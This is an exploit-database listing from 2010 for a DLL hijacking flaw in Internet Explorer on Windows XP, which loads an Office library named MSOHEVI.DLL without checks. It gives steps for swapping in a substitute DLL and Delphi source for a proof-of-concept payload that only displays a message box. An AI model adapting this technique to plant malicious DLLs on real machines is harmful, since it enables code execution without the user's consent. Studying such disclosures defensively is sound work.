[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Internet Explorer Dll Hijacking Exploit

Author
STRELiTZIA
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14040
Category
local exploits
Date add
08-09-2010
Platform
windows
=======================================
Internet Explorer Dll Hijacking Exploit
=======================================

Exploit Title  : [Internet Explorer Dll Hijacking Exploit]
Date           : [08 Sept 2010]
Author         : [STRELiTZIA]
Software       : [INTERNET EXPLORER]
Tested on      : [Windows Xp SP3 + Office 2007]
	
============================
=       Description        = 
============================
Internet Explorer laod %drive%:\%Program Files%\Microsoft Office\Office12\MSOHEVI.DLL library without checks,
or any visual warning messages related to library modifications.
Vulnerability that can allow attackers to execute malicious code locally, without user consent, in the privilege
context of the targeted application.
 
 
============================
=       Instructions       =
============================
1- Copy "Test.dll" into "%drive%:\%Program Files%\Microsoft Office\Office12\"
2- Rename "MSOHEVI.DLL" to "MSOHEVI.DLL_Original".
3- Rename "Test.dll" to "MSOHEVI.DLL".
	
============================
=          Tests           =
============================
- Launch Internet Explorer.

	
============================
= Test Dll Source "Delphi" =
============================
Library Test;
uses
  Windows;

begin
  MessageBoxA
    (
    0,
    PChar('Yep, I''m running in your system without your permission.'),
	PChar('Sample'),
    MB_ICONSTOP
    );
end.



#  0day.today [2024-11-15]  #